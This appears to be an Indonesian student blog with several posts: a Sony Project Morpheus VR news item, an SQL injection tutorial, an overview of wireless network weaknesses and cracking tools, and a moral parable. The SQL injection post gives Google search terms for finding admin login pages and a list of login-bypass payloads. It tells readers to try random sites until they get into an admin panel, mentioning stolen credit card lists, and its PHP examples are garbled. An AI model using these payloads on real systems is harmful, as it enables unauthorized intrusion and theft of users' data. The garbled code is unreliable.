Kamis, 07 Januari 2016


TUGAS SISTEM MANEJEMEN KEAMANAN KOMPUTER
DIKERJAKAN OLEH :
FIFI HARTATI                          131102755
ANDRIYANI                            131102752
AFENDI                                   131102738
ROBBY PRATAMA P.              131102734
MARGARETHA PRISCILIA     131102732


Project Sony Morpheus VR Hadir 2016





Sony pertama kalinya memperkenalkan teknologi virtual reality miliknya yang disebut sebagai Project Morpheus pada Game Developers Conference di San Fransisco tahun lalu. Setahun kemudian, Sony akhirnya mengumumkan tanggal rilis perangkat ini, yaitu berkisar pada semester pertama 2016.

“Virtual Reality adalah inovasi berikutnya dari PlayStation yang mungkin akan mengubah masa depan game,” kata Shuhei Yoshida, President Sonys Worldwide Studios. Project Morpheus versi prototaip kedua ini membawakan kemaskini dari segi spesifikasi dan penawaran, tetapi masih mengekalkan rekaan asalnya.

Project Morpheus sememangnya telah mengemparkan industri VR setakat ini, namun HMD (Head Mounted Display)  menampilkan skrin 1920 x RGB x 1080 OLED dengan kadar segar semula 120Hz, manakala skrin 5.7 inci (dipertingkatkan dari 5 inci) itu menawarkan sudut penglihatan sebanyak 100 darjah.

Lebih menakjubkan lagi, pembangun permainan video boleh membangunkan permainan video mereka pada kadar 60fps, tetapi boleh mencapai output 120fps menggunakan satu teknik dipanggil “reprojection”.

“Kami ingin meningkatkan kualitas visual dan ketepatan headset ini untuk mengikuti gerakan pemain,” katanya. Selain itu, desain headset ini juga sudah mengalami perubahan agar dapat digunakan dengan lebih nyaman.

Seperti yang dilansir dari The Verge, sebelum ini, jarang muncul berita mengenai Project Morpheus, meski telah muncul beberapa demo yang menunjukkan potensi dari headset ini.
“Demo yang sudah kami keluarkan hanyalah permulaan,” tambah Yoshida.
“Antusiasme dari para pengembang akan adanya teknologi baru ini mengingatkan saya akan tahun-tahun awal pengembangan game.”

Nama-nama developer besar, seperti Crytek dan Epic Games, sudah menyatakan kesiapannya untuk membuat konten bagi Morpheus. Diharapkan, nama-nama developer game besar lainnya akan segera bergabung ke pengembangan game untuk Morpheus.

di Tidak ada komentar:

Senin, 07 Desember 2015

TUTORIAL SQL INJECTION

  
Pengertian SQL Injection 
1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Sebab terjadinya SQL Injection
1)   Tidak adanya penanganan terhadap karakter – karakter tanda petik satu dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL. 
2)  Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

Bug SQL Injection berbahaya ? 
  1.    Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account. 
 2.   Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database. 
 3.   Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.

Apa saja yang diperlukan untuk melakukan SQL Injection ? 
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice

Contoh sintaks SQL Injection Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =$username and password =
   „$password”; , {dari GET atau POST variable }
2) isikan password dengan string or ‟‟ =
3) hasilnya maka SQL akan seperti ini = “select   * from login where username =
   $username and password=pass or „=”; , { dengan SQL ini hasil selection akan    selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL

Gambar contoh SQL Injection

Contoh sintaks SQL Injection
1) Sintaks SQL string ‘-- setelah nama username 
2) Query database awal :

Rounded Rectangle: select * from user where name = ‘bob’ and password = ‘robot’ 

Berubah menjadi :
Rounded Rectangle: Select * from user where name = ‘bob’—‘and password = ‘xxx’ 



Contoh sintaks SQL Injection SQL Injection melalui URL, contohnya :

1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter „ dengan  memodifikasi php.ini

  1.    Merubah script php Contoh script php semula :
$query = "select id,name,email,password,type,block from user " . 
"where email = '$Email' and password = '$Password'"; 
$hasil = mySQL_query ($query, $id_mySQL); 
while($row = mySQL_fetch_row($hasil))
{
 $Id = $row[0]; 
$name = $row[1]; 
$email = $row[2]; 
$password = $row[3]; 
$type = $row[4]; 
$block = $row[5]; 
if(strcmp($block, 'yes') == 0)
{
 echo "<script>alert('Your account has been blocked');

document.location.href='index.php';</script>\n"; 
exit();
}
 else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter or ‟‟ = kedalam form email dan password maka akan terbentuk query sebagai berikut : 
Rounded Rectangle: select id,nama,password,type,block from user where e-mail = “or”=”and password=”or”=”
 

Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user".
 "where email = '$Email'"; 
$hasil = mySQL_query($query, $id_mySQL); 
while($row = mySQL_fetch_row($hasil))
$Id = $row[0];  $name = $row[1]; 
$email = $row[2]; 
$password = $row[3]; 
$type = $row[4]; 
$block = $row[5]; 
if(strcmp($block, 'yes') == 0)
 { 
echo "<script>alert ('Your account has been blocked');  document.location.href='index.php';</script>\n"; 
exit(); 
$pass = md5($Password); 
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));


  2.   Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter „ menjadi \ misal SQL injection menjadi SQL injec\tion
Contoh :     $kar = “SQL injection”;   
$filter = mySQL_escape_string($kar);   
echo”Hasil filter : $filter”; 
Hasilnya :


  3.   Pemfilteran karakter ‘ dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php. Ini  sehingga menyebabkan string maupun karakter „ diubah menjadi \ secara otomatis oleh php
Contoh :

Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true 
for i = 1 to len( input )
c = mid( input, i, 1 )
 if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
"/admin.asp"
 "/login.asp"
 "/logon.asp"
 "/adminlogin.asp"
 "/adminlogon.asp"
 "/admin_login.asp"
 "/admin_logon.asp"
 "/admin/admin.asp"
 "/admin/login.asp"
 "/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}

3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword). 
4) Masukkan kode berikut :
User name : ` or `a'='a 
Password : ` or `a'='a (termasuk tanda petiknya) 
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,  dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak. 
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
 7) Banyak variasi kode yang mungkin, antara lain : 
User name : admin 
Password : ` or `a'='a 
atau bisa dimasukkan ke dua–duanya misal :
„ or 0=0 --  ;  “ or 0=0 -- ;  or 0=0 -- ;  „ or 0=0 # ; 
 “ or 0=0 # ;  „ orx=x ;  “ or “x”=”x  ;  „)
or („x=x

 8) Cobalah sampai berhasil hingga anda bisa  masuk ke admin panel

Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.

Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil. 



R E F E R E N S I 
1) -------------, SQLinjection, (www.BlackAngels.it).
2) -------------, Advanced SQL injection in SQL server applications, (www.ngssoftware.com).
3) -------------, SQL injection walktrough (www.securiteam.com).
4) BM-100, ”Hacking hiltonjakarta.com (SQL Injection)”, 24 Juli 2005,  (http://www.jasakom.com). 

5) Budi Raharjo, ”Keamanan Sistem Informasi Berbasis Internet”, PT Insan Indonesia & PT INDOCISC, Jakarta,2002.
di Tidak ada komentar:

Selasa, 03 November 2015

Wireless

Beberapa kelemahan pada jaringan wireless yang bisa digunakan attacker melakukan serangan antara lain:

1. Hide SSID
Banyak administrator menyembunyikan Services Set Id (SSID) jaringan wireless mereka dengan maksud agar hanya yang mengetahui SSID yang dapat terhubung ke jaringan mereka. Hal ini tidaklah benar, karena SSID sebenarnya tidak dapat disembuyikan secara sempurna. Pada saat saat tertentu atau khususnya saat client akan terhubung (assosiate) atau ketika akan memutuskan diri (deauthentication) dari sebuah jaringan wireless, maka client akan tetap mengirimkan SSID dalam bentuk plain text (meskipun menggunakan enkripsi), sehingga jika kita bermaksud menyadapnya, dapat dengan mudah menemukan informasi tersebut. Beberapa tools yang dapat digunakan untuk mendapatkan ssid yang di-hidden antara lain: kismet (kisMAC), ssid_jack (airjack), aircrack dan masih banyak lagi. Berikut meupakan aplikasi Kismet yang secang melakukan sniffing.

2. WEP
Teknologi Wired Equivalency Privacy atau WEP memang merupakan salah satu standar enkripsi yang paling banyak digunakan. Namun, teknik enkripsi WEP ini memiliki celah keamanan yang cukup mengganggu. Bisa dikatakan, celah keamanan ini sangat berbahaya. Tidak ada lagi data penting yang bisa lewat dengan aman. Semua data yang telah dienkripsi sekalipun akan bisa dipecahkan oleh para penyusup. Kelemahan WEP antara lain :
•    Masalah kunci yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.
•    WEP menggunakan kunci yang bersifat statis
•    Masalah Initialization Vector (IV) WEP
•    Masalah integritas pesan Cyclic Redundancy Check (CRC-32)
Aplikasi yang bisa digunakan untuk melakukan mengcapture paket yaitu Airodump.  aplikasi airodump yang sedang mengcaptute paket pada WLAN. Setelah data yang dicapture mencukupi, dilakukan proses cracking untuk menemukan WEP key. Aplikasi yang bisa digunakan untuk melakukan menembus enkripsi WEP yaitu Aircrack.

3. WPA-PSK atau WPA2-PSK
WPA merupakan teknologi keamanan sementara yang diciptakan untuk menggantikan kunci WEP. Ada dua jenis yakni WPA personal (WPA-PSK), dan WPA-RADIUS. Saat ini yang sudah dapat di crack adalah WPA-PSK, yakni dengan metode brute force attack secara offline. Brute force dengan menggunakan mencoba-coba banyak kata dari suatu kamus. Serangan ini akan berhasil jika passphrase yang digunakan wireless tersebut memang terdapat pada kamus kata yang digunakan si hacker. Untuk mencegah adanya serangan terhadap keamanan wireless menggunakan WPA-PSK, gunakanlah passphrase yang cukup panjang (satu kalimat).

4. MAC Filter
Hampir setiap wireless access point maupun router difasilitasi dengan keamanan MAC Filtering. Hal ini sebenarnya tidak banyak membantu dalam mengamankan komunikasi wireless, karena MAC address sangat mudah dispoofing atau bahkan dirubah. Tools ifconfig pada OS Linux/Unix atau beragam tools spt network utilitis, regedit, smac, machange pada OS windows dengan mudah digunakan untuk spoofing atau mengganti MAC address.
Masih sering ditemukan wifi di perkantoran dan bahkan ISP (yang biasanya digunakan oleh warnet-warnet) yang hanya menggunakan proteksi MAC Filtering. Dengan menggunakan aplikasi wardriving seperti kismet/kisMAC atau aircrack tools, dapat diperoleh informasi MAC address tiap client yang sedang terhubung ke sebuah Access Point. Setelah mendapatkan informasi tersebut, kita dapat terhubung ke Access point dengan mengubah MAC sesuai dengan client tadi. Pada jaringan wireless, duplikasi MAC address tidak mengakibatkan konflik. Hanya membutuhkan IP yang berbeda dengan client yang tadi.

5. Weak protocols (protokol yang lemah)
Komunikasi jaringan komputer menggunakan protokol antara client dan server. Kebanyakan dari protokol yang digunakan saat ini merupakan protocol yang telah digunakan beberapa dasawarsa belakangan. Protokol lama ini, seperti File Transmission Protocol (FTP), TFTP ataupun telnet, tidak didesain untuk menjadi benar-benar aman. Malahan faktanya kebanyakan dari protocol ini sudah seharusnya digantikan dengan protokol yang jauh lebih aman, dikarenakan banyak titik rawan yang dapat menyebabkan pengguna (user) yang tidak bertanggung jawab dapat melakukan eksploitasi. Sebagai contoh, seseorang dengan mudah dapat mengawasi "traffic" dari telnet dan dapat mencari tahu nama user dan password.

6. Software issue (masalah perangkat lunak)
Menjadi sesuatu yang mudah untuk melakukan eksploitasi celah pada perangkat lunak. Celah ini biasanya tidak secara sengaja dibuat tapi kebanyakan semua orang mengalami kerugian dari kelemahan seperti ini. Celah ini biasanya dibakukan bahwa apapun yang dijalankan oleh "root" pasti mempunyai akses "root", yaitu kemampuan untuk melakukan segalanya didalam system tersebut. Eksploitasi yang sebenarnya mengambil keuntungan dari lemahnya penanganan data yang tidak diduga oleh pengguna, sebagai contoh, buffer overflow dari celah keamanan "format string" merupakan hal yang biasa saat ini. Eksploitasi terhadap celah tersebut akan menuju kepada situasi dimana hak akses pengguna akan dapat dinaikkan ke tingkat akses yang lebih tinggi. Ini disebut juga dengan "rooting" sebuah "host" dikarenakan penyerang biasanya membidik untuk mendapatkan hak akses "root".

7. Hardware issue (masalah perangkat keras).
Biasanya perangkat keras tidak mempunyai masalah pada penyerangan yang terjadi. Perangkat lunak yang dijalankan oleh perangkat keras dan kemungkinan kurangnya dokumentasi spesifikasi teknis merupakan suatu titik lemah. Berikut ini merupakan contoh bagaimana perangkat keras mempunyai masalah dengan keamanan.

contoh 1: Cisco
Sudah lazim router cisco dianggap mempunyai masalah sistematis didalam perangkat lunak IOS (Interwork operating system) yang digunakan oleh mereka sebagai sistem operasi pada tahun 2003. Celah dalam perangkat lunak dapat menuju kepada "denial of service" (Dos) dari semua perangkatrouter. Masalah keamanan ini terdapat dalam cara IOS menangani protokol 53(SWIPE), 55(IP Mobility) dan 77(Sun ND) dengan nilai TTL (Time to live) 0 atau 1. Biasanya, Protocol Independent Multicast (PIM) dengan semua nilai untuk hidup, dapat menyebabkan router menandai input permintaan yang penuh terhadap "interface" yang dikirimkan. Sebagai permintaan bila penuh, maka router tidak akan melakukan proses "traffic" apapun terhadap "interface" yang dipertanyakan. Cisco juga mempunyai beberapa celah keamanan yang terdokumentasi dan "patch" yang diperlukan telah tersedia untuk waktu yang cukup lama.

contoh 2: Linksys
Perangkat linksys mempunyai harga yang cukup murah sehingga banyak digunakan oleh orang. Beberapa perangkat linksys mempunyai masalah dengan celah keamanan yang dapat menuju kepada serangan "denial of service" (DoS). Celah keamanan yang memprihatinkan terdapat pada penanganan parameter "URL Embedded" yang dikirimkan kepada perangkat.

8. Misconfiguration (konfigurasi yang salah).
Kesalahan konfigurasi pada server dan perangkat keras (hardware) sangat sering membuat para penyusup dapat masuk kedalam suatu system dengan mudah. Sebagai contoh, penggantian halaman depan suatu situs dikarenakan kesalahan konfigurasi pada perangkat lunak "www-server" ataupun modulnya. Konfigurasi yang tidak hati-hati dapat menyebabkan usaha penyusupan menjadi jauh lebih mudah terlebih jika ada pilihan lain yang dapat diambil oleh para penyusup. Sebagai contoh, sebuah server yang menjalankan beberapa layanan SSH dapat dengan mudah disusupi apabila mengijinkan penggunaan protokol versi 1 atau "remote root login" (RLOGIN) diizinkan. Kesalahan konfigurasi yang jelas ini menyebabkan terbukanya celah keamanan dengan penggunaan protokol versi 1, seperti "buffer overflow" yang dapat menyebabkan penyusup dapat mengambil hak akses "root" ataupun juga dengan menggunakan metode "brute-force password" untuk dapat menebak password "root".



- See more at: http://ilmu27.blogspot.co.id/2012/08/makalah-keamanan-jaringan-network.html#sthash.hpF7rH3e.dpuf
di Tidak ada komentar:

Rabu, 21 Oktober 2015

Renungan




Penebang Kayu Kehilangan Kapak


Alkisah, ada seorang penebang kayu. Suatu hari dia kehilangan kapaknya, sehingga dia tidak bisa bekerja. Dia mencurigai tetangganya yang mencuri kapaknya.

Pagi itu ketika sang tetangga berangkat & menutupi peralatan kerjanya dengan kain, rasanya kapaknya pasti disembunyikan disana, apalagi tetangga ini senyumnya terasa tidak tulus. Pasti dia pencurinya.
Besoknya, tetangganya bahkan terasa jadi ramah berlebihan karena biasanya jarang menyapa, kali ini menyempatkan berbasa-basi. Apalagi dilihat hasil tebangan kayunya dua hari ini banyak sekali, pasti dia menebang menggunakan kapak curiannya.

Semakin dipikir semakin yakin.

Pada hari ketiga baru disadari ternyata kapaknya tersimpan di laci dapur. Istrinya yg sedang keluar kota menyimpankan disana. Senang benar hatinya karena kapaknya dapat ditemukan kembali.

Dia amati lagi tetangganya yang lewat, dan dia merasa tetangga ini tidak berkelakuan seperti pencuri & senyumnya juga tulus-tulus saja. Bahkan percakapannya terasa sangat wajar dan jujur. Dia heran kenapa kemarin dia melihat tetangganya seperti pencuri?

Persepsi membentuk kenyataan, pikiran kita membentuk sudut pandang kita.

Apa yang kita yakini akan semakin terlihat oleh kita sebagai kenyataan.

Sebagai contoh, apapun yang dilakukan orang yang kita cintai adalah baik dan benar. Anak nakal dianggap lucu, kekasih pelit dianggap berhemat, orang cerewet dibilang perhatian, keras kepala dibilang berprinsip & makanan tidak enak dibilang bergizi.

Hidup tidak pernah & tidak ada yang adil, tidak ada benar salah, kita ciptakan sudut pandang kita sendiri. Kita menemukan apa yang kita ingin temukan. Apa yang terlihat bukan kenyataan, kenyataan adalah siapa kita & bagaimana kita memandang semuanya itu. Pandangan kita berubah mengikuti perubahan jaman & keadaan.

Segalanya mengalir dalam dimensi ruang dan waktu. Mari kita renungkan
di Tidak ada komentar:
Langganan: Postingan (Atom)